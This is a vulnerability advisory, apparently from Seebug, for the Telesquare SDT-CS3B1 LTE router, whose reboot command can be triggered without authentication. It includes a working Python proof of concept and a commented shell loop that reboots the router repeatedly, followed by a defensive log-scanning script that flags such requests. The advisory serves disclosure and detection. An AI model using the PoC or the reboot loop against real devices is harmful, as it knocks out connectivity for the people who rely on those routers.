Telesquare SKT LTE Router SDT-CS3B1 Remote Reboot Denial Of Service

2017-12-29T00:00:00
ID SSV:97030
Type seebug
Reporter Root
Modified 2017-12-29T00:00:00

Description

Summary

We introduce the SDT-CS3B1 LTE router, a router product based on SKT 3G and 4G LTE wireless communication.

Description

The router's reboot command can be executed without authentication. Attackers can exploit this issue to cause a denial of service.

/lte/lteuicc.shtml:

```
function RebootRequest()
{
    var url = "../cgi-bin/lte.cgi?";
    var param = "Command=Reboot";
    XHRPost(RebootHandle, url, param, false); // sync call
}
```

Vendor

Telesquare Co., Ltd. - http://www.telesquare.co.kr

Affected Version

  • FwVer: SDT-CS3B1, sw version 1.2.0
  • LteVer: ML300S5XEA41_090 1 0.1.0
  • Modem model: PM-L300S

Tested On

  • lighttpd/1.4.20

PoC

```python
import sys, requests

# Both <ip> and <port> are required
if len(sys.argv) < 3:
    print('SKT LTE Router SDT-CS3B1 Remote Reboot')
    print('Usage: b00t.py <ip> <port>\n')
    quit()

ip = sys.argv[1]
port = sys.argv[2]

# Unauthenticated request to the reboot command
r = requests.get("http://"+ip+":"+port+"/cgi-bin/lte.cgi?Command=Reboot")

# shw: while true; do ./b00t.py 10.0.0.17 8081; sleep 20; done
#print(r.content)  #if in r.content: <xml></xml>, reboot true.

print("Router rebooted.")
```

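For detection, the added example below (not part of the original advisory) scans web access-log lines for requests that pass `Command=Reboot` to `/cgi-bin/lte.cgi` and flags sources that repeat them. It assumes a common/combined-style log format from the device or an upstream proxy, and the sample lines are constructed. A POST like the one in `RebootRequest()` carries the parameter in the body, which access logs do not record, so only the query-string form is covered.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines (not captured from a device). "Other" is a placeholder command.
SAMPLE_LOG = [
    '10.0.0.50 - - [29/Dec/2017:10:00:00 +0000] "GET /lte/lteuicc.shtml HTTP/1.1" 200 5120',
    '10.0.0.99 - - [29/Dec/2017:10:00:05 +0000] "GET /cgi-bin/lte.cgi?Command=Reboot HTTP/1.1" 200 11',
    '10.0.0.99 - - [29/Dec/2017:10:00:25 +0000] "GET /cgi-bin/lte.cgi?command=%52eboot HTTP/1.1" 200 11',
    '10.0.0.99 - - [29/Dec/2017:10:00:45 +0000] "GET /cgi-bin/lte.cgi?Command=Reboot HTTP/1.1" 200 11',
    '10.0.0.50 - - [29/Dec/2017:10:05:00 +0000] "GET /cgi-bin/lte.cgi?Command=Other HTTP/1.1" 200 300',
    '10.0.0.51 - - [29/Dec/2017:10:06:00 +0000] "GET /cgi-bin/lte.cgi?Command=Reboot HTTP/1.1" 200 11',
]

# Assumed layout: host ident user [time] "METHOD target PROTO" status ...
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

def find_reboot_requests(lines):
    """Return (time, source, method) for every request asking lte.cgi to reboot."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the assumed format
        src, ts, method, target, _status = m.groups()
        url = urlsplit(target)
        if not url.path.lower().endswith("/cgi-bin/lte.cgi"):
            continue
        # parse_qs percent-decodes; compare case-insensitively to catch trivial variants
        params = {k.lower(): [v.lower() for v in vs] for k, vs in parse_qs(url.query).items()}
        if "reboot" in params.get("command", []):
            when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
            hits.append((when, src, method))
    return hits

def repeated_sources(hits, window=timedelta(minutes=2), threshold=3):
    """Sources that sent at least `threshold` reboot requests inside one window."""
    by_src = defaultdict(list)
    for when, src, _method in sorted(hits):
        by_src[src].append(when)
    flagged = set()
    for src, times in by_src.items():
        for i in range(len(times) - threshold + 1):
            if times[i + threshold - 1] - times[i] <= window:
                flagged.add(src)
    return flagged
```

Since the endpoint requires no authentication, every hit from `find_reboot_requests` is worth reviewing; `repeated_sources` separates a sustained reboot loop from a single request.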